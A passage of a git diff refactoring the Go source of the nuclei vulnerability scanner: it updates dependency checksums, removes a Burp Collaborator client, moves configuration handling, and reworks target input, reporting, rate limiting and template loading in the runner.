h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210315160823-c6e025ad8005/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4 h1:EZ2mChiOa8udjfp6rRmswTbtZN/QzUQp4ptM4rnjHvc= -golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b h1:qh4f65QIVFjq9eBURLEYWqaEXmOyqdUyiBSgaXWccWk= +golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= @@ -447,8 +528,9 @@ golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/text v0.3.4 h1:0YWbFKbhXG/wIiuHDSKpS0Iy7FSA+u45VtBMfQcFTTc= -golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20191024005414-555d28b269f0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= @@ -581,6 +663,7 @@ google.golang.org/protobuf v1.26.0 h1:bxAC2xTBsZGibn2RTntX0oH50xLsqy1OxA9tTL3p/l google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= gopkg.in/corvus-ch/zbase32.v1 v1.0.0 h1:K4u1NprbDNvKPczKfHLbwdOWHTZ0zfv2ow71H1nRnFU= @@ -595,6 +678,7 @@ gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0-20200605160147-a5ece683394c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/v2/internal/collaborator/collaborator.go b/v2/internal/collaborator/collaborator.go deleted file mode 100644 index 076e18a8aa..0000000000 --- a/v2/internal/collaborator/collaborator.go +++ /dev/null @@ -1,72 +0,0 @@ -package collaborator - -import ( - "strings" - "sync" - "time" - - "github.com/projectdiscovery/collaborator" -) - -var ( - // PollSeconds is the seconds to poll at. - PollSeconds = 5 - // DefaultMaxBufferLimit is the default request buffer limit - DefaultMaxBufferLimit = 150 - // DefaultPollInterval is the default poll interval for burp collabortor polling. - DefaultPollInterval time.Duration = time.Second * time.Duration(PollSeconds) - // DefaultCollaborator is the default burp collaborator instance - DefaultCollaborator = &Collaborator{Collab: collaborator.NewBurpCollaborator()} -) - -// Collaborator is a client for recording burp collaborator interactions -type Collaborator struct { - sync.RWMutex - options *Options // unused - Collab *collaborator.BurpCollaborator -} - -// Options contains configuration options for collaborator client -type Options struct { - BIID string - PollInterval time.Duration - MaxBufferLimit int -} - -// New creates a new collaborator client -func New(options *Options) *Collaborator { - collab := collaborator.NewBurpCollaborator() - collab.AddBIID(options.BIID) - collab.MaxBufferLimit = options.MaxBufferLimit - return &Collaborator{Collab: collab, options: options} -} - -// Poll initiates collaborator polling if any BIIDs were provided -func (b *Collaborator) Poll() { - // if no valid biids were provided just return - if len(b.Collab.BIIDs) > 0 { - go b.Collab.PollEach(DefaultPollInterval) - } -} - -// Has checks if a collabrator hit was found for a URL -func (b *Collaborator) Has(s string) bool { - for _, r := range b.Collab.RespBuffer { - for i := 0; i < len(r.Responses); i++ { - // search in dns - http - smtp - b.RLock() - found := strings.Contains(r.Responses[i].Data.RawRequestDecoded, s) || - strings.Contains(r.Responses[i].Data.RequestDecoded, s) || - strings.Contains(r.Responses[i].Data.MessageDecoded, s) - b.RUnlock() - - if found { - b.Lock() - r.Responses = append(r.Responses[:i], r.Responses[i+1:]...) - b.Unlock() - return true - } - } - } - return false -} diff --git a/v2/internal/runner/banner.go b/v2/internal/runner/banner.go index cc17165868..36196349d7 100644 --- a/v2/internal/runner/banner.go +++ b/v2/internal/runner/banner.go @@ -1,17 +1,19 @@ package runner -import "github.com/projectdiscovery/gologger" +import ( + "fmt" -const banner = ` - __ _ - ____ __ _______/ /__ (_) - / __ \/ / / / ___/ / _ \/ / - / / / / /_/ / /__/ / __/ / - /_/ /_/\__,_/\___/_/\___/_/ v2.3.6 -` + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" +) -// Version is the current version of nuclei -const Version = `2.3.6` +var banner = fmt.Sprintf(` + __ _ + ____ __ _______/ /__ (_) + / __ \/ / / / ___/ / _ \/ / + / / / / /_/ / /__/ / __/ / +/_/ /_/\__,_/\___/_/\___/_/ %s +`, config.Version) // showBanner is used to show the banner to the user func showBanner() { diff --git a/v2/internal/runner/config.go b/v2/internal/runner/config.go index fe8a62e2ca..75c10db611 100644 --- a/v2/internal/runner/config.go +++ b/v2/internal/runner/config.go @@ -1,128 +1 @@ package runner - -import ( - "os" - "path/filepath" - "regexp" - "time" - - jsoniter "github.com/json-iterator/go" - "github.com/projectdiscovery/gologger" - "gopkg.in/yaml.v2" -) - -// nucleiConfig contains some configuration options for nuclei -type nucleiConfig struct { - TemplatesDirectory string `json:"templates-directory,omitempty"` - CurrentVersion string `json:"current-version,omitempty"` - LastChecked time.Time `json:"last-checked,omitempty"` - IgnoreURL string `json:"ignore-url,omitempty"` - NucleiVersion string `json:"nuclei-version,omitempty"` - LastCheckedIgnore time.Time `json:"last-checked-ignore,omitempty"` - // IgnorePaths ignores all the paths listed unless specified manually - IgnorePaths []string `json:"ignore-paths,omitempty"` -} - -// nucleiConfigFilename is the filename of nuclei configuration file. -const nucleiConfigFilename = ".templates-config.json" - -var reVersion = regexp.MustCompile(`\d+\.\d+\.\d+`) - -// readConfiguration reads the nuclei configuration file from disk. -func readConfiguration() (*nucleiConfig, error) { - home, err := os.UserHomeDir() - if err != nil { - return nil, err - } - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) - file, err := os.Open(templatesConfigFile) - if err != nil { - return nil, err - } - defer file.Close() - - config := &nucleiConfig{} - err = jsoniter.NewDecoder(file).Decode(config) - if err != nil { - return nil, err - } - return config, nil -} - -// readConfiguration reads the nuclei configuration file from disk. -func (r *Runner) writeConfiguration(config *nucleiConfig) error { - home, err := os.UserHomeDir() - if err != nil { - return err - } - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - if config.IgnoreURL == "" { - config.IgnoreURL = "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" - } - config.LastChecked = time.Now() - config.LastCheckedIgnore = time.Now() - config.NucleiVersion = Version - templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) - file, err := os.OpenFile(templatesConfigFile, os.O_WRONLY|os.O_CREATE, 0777) - if err != nil { - return err - } - defer file.Close() - - err = jsoniter.NewEncoder(file).Encode(config) - if err != nil { - return err - } - return nil -} - -const nucleiIgnoreFile = ".nuclei-ignore" - -type ignoreFile struct { - Tags []string `yaml:"tags"` - Files []string `yaml:"files"` -} - -// readNucleiIgnoreFile reads the nuclei ignore file marking it in map -func (r *Runner) readNucleiIgnoreFile() { - file, err := os.Open(r.getIgnoreFilePath()) - if err != nil { - gologger.Error().Msgf("Could not read nuclei-ignore file: %s\n", err) - return - } - defer file.Close() - - ignore := &ignoreFile{} - if err := yaml.NewDecoder(file).Decode(ignore); err != nil { - gologger.Error().Msgf("Could not parse nuclei-ignore file: %s\n", err) - return - } - r.options.ExcludeTags = append(r.options.ExcludeTags, ignore.Tags...) - r.templatesConfig.IgnorePaths = append(r.templatesConfig.IgnorePaths, ignore.Files...) -} - -// getIgnoreFilePath returns the ignore file path for the runner -func (r *Runner) getIgnoreFilePath() string { - var defIgnoreFilePath string - - home, err := os.UserHomeDir() - if err == nil { - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - defIgnoreFilePath = filepath.Join(configDir, nucleiIgnoreFile) - return defIgnoreFilePath - } - cwd, err := os.Getwd() - if err != nil { - return defIgnoreFilePath - } - - cwdIgnoreFilePath := filepath.Join(cwd, nucleiIgnoreFile) - return cwdIgnoreFilePath -} diff --git a/v2/internal/runner/options.go b/v2/internal/runner/options.go index 6b55c4aa41..f976436952 100644 --- a/v2/internal/runner/options.go +++ b/v2/internal/runner/options.go @@ -10,6 +10,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/gologger/formatter" "github.com/projectdiscovery/gologger/levels" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/protocolinit" "github.com/projectdiscovery/nuclei/v2/pkg/types" ) @@ -26,15 +27,15 @@ func ParseOptions(options *types.Options) { showBanner() if options.Version { - gologger.Info().Msgf("Current Version: %s\n", Version) + gologger.Info().Msgf("Current Version: %s\n", config.Version) os.Exit(0) } if options.TemplatesVersion { - config, err := readConfiguration() + configuration, err := config.ReadConfiguration() if err != nil { gologger.Fatal().Msgf("Could not read template configuration: %s\n", err) } - gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", config.CurrentVersion, config.TemplatesDirectory) + gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", configuration.CurrentVersion, configuration.TemplatesDirectory) os.Exit(0) } @@ -83,13 +84,6 @@ func validateOptions(options *types.Options) error { return errors.New("both verbose and silent mode specified") } - if !options.TemplateList { - // Check if a list of templates was provided and it exists - if len(options.Templates) == 0 && !options.NewTemplates && len(options.Workflows) == 0 && len(options.AdvancedWorkflows) == 0 && len(options.Tags) == 0 && !options.UpdateTemplates { - return errors.New("no template/templates provided") - } - } - // Validate proxy options if provided err := validateProxyURL(options.ProxyURL, "invalid http proxy format (It should be http://username:password@host:port)") if err != nil { diff --git a/v2/internal/runner/runner.go b/v2/internal/runner/runner.go index 145ba0967c..8c14698c63 100644 --- a/v2/internal/runner/runner.go +++ b/v2/internal/runner/runner.go @@ -4,16 +4,19 @@ import ( "bufio" "fmt" "os" + "path" "path/filepath" "strings" "time" "github.com/logrusorgru/aurora" + "github.com/pkg/errors" "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/hmap/store/hybrid" - "github.com/projectdiscovery/nuclei/v2/internal/collaborator" "github.com/projectdiscovery/nuclei/v2/internal/colorizer" "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader" "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/progress" "github.com/projectdiscovery/nuclei/v2/pkg/projectfile" @@ -24,6 +27,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/engine" "github.com/projectdiscovery/nuclei/v2/pkg/reporting" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/disk" + "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/sarif" "github.com/projectdiscovery/nuclei/v2/pkg/templates" "github.com/projectdiscovery/nuclei/v2/pkg/types" "github.com/remeh/sizedwaitgroup" @@ -39,7 +43,7 @@ type Runner struct { output output.Writer interactsh *interactsh.Client inputCount int64 - templatesConfig *nucleiConfig + templatesConfig *config.Config options *types.Options projectFile *projectfile.ProjectFile catalog *catalog.Catalog @@ -56,35 +60,35 @@ func New(options *types.Options) (*Runner, error) { runner := &Runner{ options: options, } - if options.Headless { - browser, err := engine.New(options) - if err != nil { + if options.UpdateNuclei { + if err := updateNucleiVersionToLatest(runner.options.Verbose); err != nil { return nil, err } - runner.browser = browser + return nil, nil } if err := runner.updateTemplates(); err != nil { gologger.Warning().Msgf("Could not update templates: %s\n", err) } - // Read nucleiignore file if given a templateconfig - if runner.templatesConfig != nil { - runner.readNucleiIgnoreFile() + if options.Headless { + browser, err := engine.New(options) + if err != nil { + return nil, err + } + runner.browser = browser } runner.catalog = catalog.New(runner.options.TemplatesDirectory) - runner.catalog.AppendIgnore(runner.templatesConfig.IgnorePaths) - var reportingOptions *reporting.Options if options.ReportingConfig != "" { file, err := os.Open(options.ReportingConfig) if err != nil { - gologger.Fatal().Msgf("Could not open reporting config file: %s\n", err) + return nil, errors.Wrap(err, "could not open reporting config file") } reportingOptions = &reporting.Options{} if parseErr := yaml.NewDecoder(file).Decode(reportingOptions); parseErr != nil { file.Close() - gologger.Fatal().Msgf("Could not parse reporting config file: %s\n", parseErr) + return nil, errors.Wrap(parseErr, "could not parse reporting config file") } file.Close() } @@ -96,12 +100,20 @@ func New(options *types.Options) (*Runner, error) { reportingOptions.DiskExporter = &disk.Options{Directory: options.DiskExportDirectory} } } - if reportingOptions != nil { - if client, err := reporting.New(reportingOptions, options.ReportingDB); err != nil { - gologger.Fatal().Msgf("Could not create issue reporting client: %s\n", err) + if options.SarifExport != "" { + if reportingOptions != nil { + reportingOptions.SarifExporter = &sarif.Options{File: options.SarifExport} } else { - runner.issuesClient = client + reportingOptions = &reporting.Options{} + reportingOptions.SarifExporter = &sarif.Options{File: options.SarifExport} + } + } + if reportingOptions != nil { + client, err := reporting.New(reportingOptions, options.ReportingDB) + if err != nil { + return nil, errors.Wrap(err, "could not create issue reporting client") } + runner.issuesClient = client } // output coloring @@ -114,23 +126,35 @@ func New(options *types.Options) (*Runner, error) { os.Exit(0) } - if (len(options.Templates) == 0 || !options.NewTemplates || (options.Targets == "" && !options.Stdin && options.Target == "")) && options.UpdateTemplates { + if (len(options.Templates) == 0 || !options.NewTemplates || (options.TargetsFilePath == "" && !options.Stdin && len(options.Targets) == 0)) && options.UpdateTemplates { os.Exit(0) } - if hm, err := hybrid.New(hybrid.DefaultDiskOptions); err != nil { - gologger.Fatal().Msgf("Could not create temporary input file: %s\n", err) - } else { - runner.hostMap = hm + hm, err := hybrid.New(hybrid.DefaultDiskOptions) + if err != nil { + return nil, errors.Wrap(err, "could not create temporary input file") } + runner.hostMap = hm runner.inputCount = 0 dupeCount := 0 - // Handle single target - if options.Target != "" { - runner.inputCount++ - // nolint:errcheck // ignoring error - runner.hostMap.Set(options.Target, nil) + // Handle multiple target + if len(options.Targets) != 0 { + for _, target := range options.Targets { + url := strings.TrimSpace(target) + if url == "" { + continue + } + + if _, ok := runner.hostMap.Get(url); ok { + dupeCount++ + continue + } + + runner.inputCount++ + // nolint:errcheck // ignoring error + runner.hostMap.Set(url, nil) + } } // Handle stdin @@ -141,21 +165,23 @@ func New(options *types.Options) (*Runner, error) { if url == "" { continue } + if _, ok := runner.hostMap.Get(url); ok { dupeCount++ continue } + runner.inputCount++ // nolint:errcheck // ignoring error runner.hostMap.Set(url, nil) } } - // Handle taget file - if options.Targets != "" { - input, err := os.Open(options.Targets) - if err != nil { - gologger.Fatal().Msgf("Could not open targets file '%s': %s\n", options.Targets, err) + // Handle target file + if options.TargetsFilePath != "" { + input, inputErr := os.Open(options.TargetsFilePath) + if inputErr != nil { + return nil, errors.Wrap(inputErr, "could not open targets file") } scanner := bufio.NewScanner(input) for scanner.Scan() { @@ -181,13 +207,19 @@ func New(options *types.Options) (*Runner, error) { // Create the output file if asked outputWriter, err := output.NewStandardWriter(!options.NoColor, options.NoMeta, options.JSON, options.Output, options.TraceLogFile) if err != nil { - gologger.Fatal().Msgf("Could not create output file '%s': %s\n", options.Output, err) + return nil, errors.Wrap(err, "could not create output file") } runner.output = outputWriter + if options.JSON && options.EnableProgressBar { + options.StatsJSON = true + } + if options.StatsJSON { + options.EnableProgressBar = true + } // Creates the progress tracking object var progressErr error - runner.progress, progressErr = progress.NewStatsTicker(options.StatsInterval, options.EnableProgressBar, options.Metrics, options.MetricsPort) + runner.progress, progressErr = progress.NewStatsTicker(options.StatsInterval, options.EnableProgressBar, options.StatsJSON, options.Metrics, options.MetricsPort) if progressErr != nil { return nil, progressErr } @@ -213,17 +245,15 @@ func New(options *types.Options) (*Runner, error) { Progress: runner.progress, }) if err != nil { - return nil, err + gologger.Error().Msgf("Could not create interactsh client: %s", err) + } else { + runner.interactsh = interactshClient } - runner.interactsh = interactshClient - } - - // Enable Polling - if options.BurpCollaboratorBiid != "" { - collaborator.DefaultCollaborator.Collab.AddBIID(options.BurpCollaboratorBiid) } - if options.RateLimit > 0 { + if options.RateLimitMinute > 0 { + runner.ratelimiter = ratelimit.New(options.RateLimitMinute, ratelimit.Per(60*time.Second)) + } else if options.RateLimit > 0 { runner.ratelimiter = ratelimit.New(options.RateLimit) } else { runner.ratelimiter = ratelimit.NewUnlimited() @@ -246,52 +276,110 @@ func (r *Runner) Close() { // RunEnumeration sets up the input layer for giving input nuclei. // binary and runs the actual enumeration -func (r *Runner) RunEnumeration() { +func (r *Runner) RunEnumeration() error { defer r.Close() - // If we have no templates, run on whole template directory with provided tags - if len(r.options.Templates) == 0 && len(r.options.Workflows) == 0 && len(r.options.AdvancedWorkflows) == 0 && !r.options.NewTemplates && (len(r.options.Tags) > 0 || len(r.options.ExcludeTags) > 0) { - r.options.Templates = append(r.options.Templates, r.options.TemplatesDirectory) - } + // If user asked for new templates to be executed, collect the list from template directory. if r.options.NewTemplates { templatesLoaded, err := r.readNewTemplatesFile() if err != nil { - gologger.Warning().Msgf("Could not get newly added templates: %s\n", err) + return errors.Wrap(err, "could not get newly added templates") } r.options.Templates = append(r.options.Templates, templatesLoaded...) } - includedTemplates := r.catalog.GetTemplatesPath(r.options.Templates, false) - excludedTemplates := r.catalog.GetTemplatesPath(r.options.ExcludedTemplates, true) - // defaults to all templates - allTemplates := includedTemplates + ignoreFile := config.ReadIgnoreFile() + r.options.ExcludeTags = append(r.options.ExcludeTags, ignoreFile.Tags...) + r.options.ExcludedTemplates = append(r.options.ExcludedTemplates, ignoreFile.Files...) + + executerOpts := protocols.ExecuterOptions{ + Output: r.output, + Options: r.options, + Progress: r.progress, + Catalog: r.catalog, + IssuesClient: r.issuesClient, + RateLimiter: r.ratelimiter, + Interactsh: r.interactsh, + ProjectFile: r.projectFile, + Browser: r.browser, + } + loaderConfig := loader.Config{ + Templates: r.options.Templates, + Workflows: r.options.Workflows, + ExcludeTemplates: r.options.ExcludedTemplates, + Tags: r.options.Tags, + ExcludeTags: r.options.ExcludeTags, + IncludeTemplates: r.options.IncludeTemplates, + Authors: r.options.Author, + Severities: r.options.Severity, + IncludeTags: r.options.IncludeTags, + TemplatesDirectory: r.options.TemplatesDirectory, + Catalog: r.catalog, + ExecutorOptions: executerOpts, + } + store, err := loader.New(&loaderConfig) + if err != nil { + return errors.Wrap(err, "could not load templates from config") + } + if r.options.Validate { + if !store.ValidateTemplates(r.options.Templates, r.options.Workflows) { + return errors.New("an error occurred during templates validation") + } + gologger.Info().Msgf("All templates validated successfully\n") + return nil // exit + } + store.Load() + + builder := &strings.Builder{} + if r.templatesConfig != nil && r.templatesConfig.NucleiLatestVersion != "" { + builder.WriteString(" (") - if len(excludedTemplates) > 0 { - excludedMap := make(map[string]struct{}, len(excludedTemplates)) - for _, excl := range excludedTemplates { - excludedMap[excl] = struct{}{} + if strings.Contains(config.Version, "-dev") { + builder.WriteString(r.colorizer.Blue("development").String()) + } else if config.Version == r.templatesConfig.NucleiLatestVersion { + builder.WriteString(r.colorizer.Green("latest").String()) + } else { + builder.WriteString(r.colorizer.Red("outdated").String()) } - // rebuild list with only non-excluded templates - allTemplates = []string{} + builder.WriteString(")") + } + messageStr := builder.String() + builder.Reset() - for _, incl := range includedTemplates { - if _, found := excludedMap[incl]; !found { - allTemplates = append(allTemplates, incl) - } else { - gologger.Warning().Msgf("Excluding '%s'", incl) - } + gologger.Info().Msgf("Using Nuclei Engine %s%s", config.Version, messageStr) + + if r.templatesConfig != nil && r.templatesConfig.NucleiTemplatesLatestVersion != "" { + builder.WriteString(" (") + + if r.templatesConfig.CurrentVersion == r.templatesConfig.NucleiTemplatesLatestVersion { + builder.WriteString(r.colorizer.Green("latest").String()) + } else { + builder.WriteString(r.colorizer.Red("outdated").String()) } + builder.WriteString(")") + } + messageStr = builder.String() + builder.Reset() + + gologger.Info().Msgf("Using Nuclei Templates %s%s", r.templatesConfig.CurrentVersion, messageStr) + + if r.interactsh != nil { + gologger.Info().Msgf("Using Interactsh Server %s", r.options.InteractshURL) + } + if len(store.Templates()) > 0 { + gologger.Info().Msgf("Templates loaded: %d (New: %d)", len(store.Templates()), r.countNewTemplates()) + } + if len(store.Workflows()) > 0 { + gologger.Info().Msgf("Workflows loaded: %d", len(store.Workflows())) } // pre-parse all the templates, apply filters finalTemplates := []*templates.Template{} - workflowPaths := r.catalog.GetTemplatesPath(r.options.Workflows, false) - availableTemplates, _ := r.getParsedTemplatesFor(allTemplates, r.options.Severity, Template) - availableWorkflows, workflowCount := r.getParsedTemplatesFor(workflowPaths, r.options.Severity, Workflows) - advancedWorkflowPaths := r.catalog.GetTemplatesPath(r.options.AdvancedWorkflows, false) + advancedWorkflowPaths := r.catalog.GetTemplatesPath(r.options.AdvancedWorkflows) availableAdvancedWorkflows, advancedWorkflowCount := r.getParsedTemplatesFor(advancedWorkflowPaths, r.options.Severity, AdvancedWorkflow) - var unclusteredRequests int64 = 0 - for _, template := range availableTemplates { + _ = advancedWorkflowCount + var unclusteredRequests int64 + for _, template := range store.Templates() { // workflows will dynamically adjust the totals while running, as // it can't be know in advance which requests will be called if len(template.Workflows) > 0 { @@ -300,9 +388,21 @@ func (r *Runner) RunEnumeration() { unclusteredRequests += int64(template.TotalRequests) * r.inputCount } - originalTemplatesCount := len(availableTemplates) + if r.options.VerboseVerbose { + for _, template := range store.Templates() { + r.logAvailableTemplate(template.Path) + } + for _, template := range store.Workflows() { + r.logAvailableTemplate(template.Path) + } + } + templatesMap := make(map[string]*templates.Template) + for _, v := range store.Templates() { + templatesMap[v.ID] = v + } + originalTemplatesCount := len(store.Templates()) clusterCount := 0 - clusters := clusterer.Cluster(availableTemplates) + clusters := clusterer.Cluster(templatesMap) for _, cluster := range clusters { if len(cluster) > 1 && !r.options.OfflineHTTP { executerOpts := protocols.ExecuterOptions{ @@ -329,14 +429,12 @@ func (r *Runner) RunEnumeration() { finalTemplates = append(finalTemplates, cluster...) } } - for _, workflows := range availableWorkflows { - finalTemplates = append(finalTemplates, workflows) - } for _, advancedWorkflow := range availableAdvancedWorkflows { finalTemplates = append(finalTemplates, advancedWorkflow) } + finalTemplates = append(finalTemplates, store.Workflows()...) - var totalRequests int64 = 0 + var totalRequests int64 for _, t := range finalTemplates { if len(t.Workflows) > 0 { continue @@ -344,25 +442,18 @@ func (r *Runner) RunEnumeration() { totalRequests += int64(t.TotalRequests) * r.inputCount } if totalRequests < unclusteredRequests { - gologger.Info().Msgf("Reduced %d requests to %d (%d templates clustered)", unclusteredRequests, totalRequests, clusterCount) + gologger.Info().Msgf("Templates clustered: %d (Reduced %d HTTP Requests)", clusterCount, unclusteredRequests-totalRequests) } - templateCount := originalTemplatesCount + len(availableWorkflows) + len(availableAdvancedWorkflows) + workflowCount := len(store.Workflows()) + templateCount := originalTemplatesCount + workflowCount + +len(availableAdvancedWorkflows) // 0 matches means no templates were found in directory if templateCount == 0 { - gologger.Fatal().Msgf("Error, no templates were found.\n") + return errors.New("no templates were found") } - gologger.Info().Msgf("Using %s rules (%s templates, %s workflows, %s advanced workflows)", - r.colorizer.Bold(templateCount).String(), - r.colorizer.Bold(templateCount-workflowCount-advancedWorkflowCount).String(), - r.colorizer.Bold(workflowCount).String(), - r.colorizer.Bold(advancedWorkflowCount).String()) - results := &atomic.Bool{} wgtemplates := sizedwaitgroup.New(r.options.TemplateThreads) - // Starts polling or ignore - collaborator.DefaultCollaborator.Poll() // tracks global progress and captures stdout/stderr until p.Wait finishes r.progress.Init(r.inputCount, templateCount, totalRequests) @@ -395,16 +486,12 @@ func (r *Runner) RunEnumeration() { r.issuesClient.Close() } if !results.Load() { - if r.output != nil { - r.output.Close() - os.Remove(r.options.Output) - } gologger.Info().Msgf("No results found. Better luck next time!") } - if r.browser != nil { r.browser.Close() } + return nil } // readNewTemplatesFile reads newly added templates from directory if it exists @@ -427,3 +514,24 @@ func (r *Runner) readNewTemplatesFile() ([]string, error) { } return templatesList, nil } + +// readNewTemplatesFile reads newly added templates from directory if it exists +func (r *Runner) countNewTemplates() int { + additionsFile := path.Join(r.templatesConfig.TemplatesDirectory, ".new-additions") + file, err := os.Open(additionsFile) + if err != nil { + return 0 + } + defer file.Close() + + count := 0 + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := scanner.Text() + if text == "" { + continue + } + count++ + } + return count +} diff --git a/v2/internal/runner/templates.go b/v2/internal/runner/templates.go index 8e65f49006..b570018930 100644 --- a/v2/internal/runner/templates.go +++ b/v2/internal/runner/templates.go @@ -1,15 +1,17 @@ package runner import ( + "bytes" "fmt" + "io/ioutil" "os" "strings" "github.com/karrick/godirwalk" "github.com/projectdiscovery/gologger" - "github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/templates" "github.com/projectdiscovery/nuclei/v2/pkg/types" + "gopkg.in/yaml.v2" ) type TemplateType uint16 @@ -76,23 +78,21 @@ func (r *Runner) getParsedTemplatesFor(templatePaths, severities []string, templ // parseTemplateFile returns the parsed template file func (r *Runner) parseTemplateFile(file string) (*templates.Template, error) { - executerOpts := protocols.ExecuterOptions{ - Output: r.output, - Options: r.options, - Progress: r.progress, - Catalog: r.catalog, - IssuesClient: r.issuesClient, - RateLimiter: r.ratelimiter, - Interactsh: r.interactsh, - ProjectFile: r.projectFile, - Browser: r.browser, + f, err := os.Open(file) + if err != nil { + return nil, err } - template, err := templates.Parse(file, executerOpts) + defer f.Close() + + data, err := ioutil.ReadAll(f) if err != nil { return nil, err } - if template == nil { - return nil, nil + + template := &templates.Template{} + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) + if err != nil { + return nil, err } return template, nil } 